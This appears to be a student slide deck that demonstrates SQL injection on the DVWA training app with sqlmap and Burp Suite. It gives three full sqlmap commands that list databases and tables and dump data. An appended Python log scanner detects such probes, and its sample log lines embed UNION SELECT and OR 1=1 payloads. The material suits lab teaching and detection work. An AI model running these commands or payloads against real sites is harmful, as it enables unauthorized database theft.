SQL Injection Attack Demonstration

This document demonstrates how to perform an SQL injection attack using the SQLmap tool. It shows the steps to identify vulnerable parameters in a URL, capture cookies for the site, and then use SQLmap commands to list databases, tables, and extract data from the tables by exploiting SQL injection vulnerabilities. The demonstration targets a vulnerable web application called DVWA running on a test server.

Uploaded by Ronak Makwana
SQL Injection Attack Demonstration

Presentation by:
(1) Ronak Makwana
(2) Yash Keral

Project Description

• The project involves performing SQL injection on vulnerable systems using the SQLmap tool.
• SQL injection attacks are designed to exploit vulnerabilities in web applications that allow an attacker to inject malicious SQL code into a query, potentially allowing unauthorized access to data.
• The project may involve using different techniques such as blind SQL injection, error-based SQL injection and other methods to exploit vulnerabilities.

SQL Injection on DVWA using SQLMap

• Step 1: To be able to run the SQLMap tool, we must first identify the parameter and the URL that we want to test for SQL injection.

SQL Injection on DVWA using SQLMap (Cont.)

• Step 2: When we enter a keyword in the User ID field, you can see that the URL changes, because the form uses the GET request method.
• We will pass this URL as a parameter to SQLMap.

SQL Injection on DVWA using SQLMap (Cont.)

• Step 3: Capture the cookie using Burp Suite; it will also be used as a parameter for SQLMap.
• Now we are ready to execute the attack.

SQL Injection on DVWA using SQLMap (Cont.)

• We can list the databases through SQL injection with the following command:

    $ sqlmap -u "http://192.168.1.19/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=4bcf28d8cd3f4ad8a6560c0fd0567c91' --dbs

SQL Injection on DVWA using SQLMap (Cont.)

• Now, to list the tables, we can use the following command:

    $ sqlmap -u "http://192.168.1.19/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=4bcf28d8cd3f4ad8a6560c0fd0567c91' -D dvwa --tables

SQL Injection on DVWA using SQLMap (Cont.)

• At the end, we can use the following command to extract data from the tables:

    $ sqlmap -u "http://192.168.1.19/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=4bcf28d8cd3f4ad8a6560c0fd0567c91' -D dvwa --dump

• So, this is how we can perform an SQL injection attack using SQLMap.
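
Seen from the server side, the requests these sqlmap runs send to the id parameter show up in the web server's access log. The following is an added example, not part of the original presentation: it scans Apache combined-format log lines for requests to the DVWA sqli page and groups suspicious ones by client. The log lines, client addresses and reason labels are constructed for illustration, and the check assumes sqlmap's default User-Agent, which contains the string "sqlmap".

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access log lines (not captured from a real server).
SAMPLE_LOG = """\
192.168.1.50 - - [10/Mar/2023:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1843 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.77 - - [10/Mar/2023:10:02:11 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%204321%3D4321--%20-&Submit=Submit HTTP/1.1" 200 1843 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.168.1.77 - - [10/Mar/2023:10:02:12 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20-&Submit=Submit HTTP/1.1" 200 1901 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.168.1.88 - - [10/Mar/2023:10:05:40 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2%20OR%201%3D1&Submit=Submit HTTP/1.1" 200 2410 "-" "Mozilla/5.0 (Windows NT 10.0)"
192.168.1.50 - - [10/Mar/2023:10:06:02 +0000] "GET /dvwa/index.php HTTP/1.1" 200 7012 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# client IP, request target and User-Agent from one combined-format line
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
# SQL keywords and metacharacters that have no place in a numeric user ID
SQL_TOKENS = re.compile(r"(?i)\b(union|select|or|and|sleep|benchmark)\b|--|['\"#;]")


def scan(log_text):
    """Return {client_ip: Counter(reason -> hits)} for suspicious requests."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        ip, target, agent = m.groups()
        url = urlsplit(target)
        reasons = []
        if "sqlmap" in agent.lower():
            reasons.append("sqlmap-user-agent")
        if url.path.rstrip("/").endswith("/vulnerabilities/sqli"):
            # parse_qs URL-decodes the value, so %27 is seen as a quote
            for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
                if not (value.isascii() and value.isdigit()):
                    reasons.append("non-numeric-id")
                if SQL_TOKENS.search(value):
                    reasons.append("sql-keyword-in-id")
        if reasons:
            findings.setdefault(ip, Counter()).update(reasons)
    return findings


if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client, dict(hits))
```

Log review of this kind only shows that the parameter is being probed; the underlying flaw is fixed in the application by binding id as a query parameter instead of concatenating it into the SQL string.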
Thank You!
